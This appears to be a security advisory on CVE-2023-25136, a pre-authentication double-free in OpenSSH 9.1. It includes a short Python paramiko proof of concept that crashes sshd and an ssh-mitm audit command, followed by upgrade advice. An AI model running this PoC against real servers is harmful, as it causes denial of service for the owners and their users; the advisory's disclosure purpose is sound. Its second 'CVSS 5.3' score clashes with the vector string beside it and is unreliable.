CVSS 9.8 CVE-2023-25136
CVSS 5.3 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
OpenSSH server (sshd) 9.1 introduced a double-free vulnerability during options.kex_algorithms handling. This is fixed in OpenSSH 9.2. The double free can be leveraged, by an unauthenticated remote attacker in the default configuration, to jump to any location in the sshd address space.
One third-party report states “remote code execution is theoretically possible.”
Description
OpenSSH version 9.2p1 was recently released with a fix for a double-free vulnerability. The vulnerability has a severe potential impact on OpenSSH servers and can result in Denial of Service (DoS) or Remote Code Execution (RCE). The JFrog Security Research team investigated the vulnerability and published a blog post with details on the vulnerability, who is affected, and a proof-of-concept to trigger it causing a DoS.
The exploit involves sending a malicious request to an OpenSSH server, triggering a double-free vulnerability in the compat_kex_proposal() function.
JFrog created a PoC exploit code, which causes a DoS in the OpenSSH server:
import paramiko
VICTIM_IP = "127.0.1"
CLIENT_ID = "PuTTY_Release_0.64"
def main():
transport = paramiko.Transport(VICTIM_IP)
transport.local_version = f"SSH-2.0-{CLIENT_ID}"
transport.connect(username='', password='')
if __name__ == "__main__":
main()
SSH-MITM has the PoC integrated as an audit command, which can be used with following arguments:
$ ssh-mitm audit CVE-2023-25136 --host 192.168.0.1
OK -> server seems vulnerable
Mitigation
It is recommended to upgrade to OpenSSH 9.2
Release Notes 9.2
fix a pre-authentication double-free memory fault introduced in OpenSSH 9.1. This is not believed to be exploitable, and it occurs in the unprivileged pre-auth process that is subject to chroot(2) and is further sandboxed on most major platforms.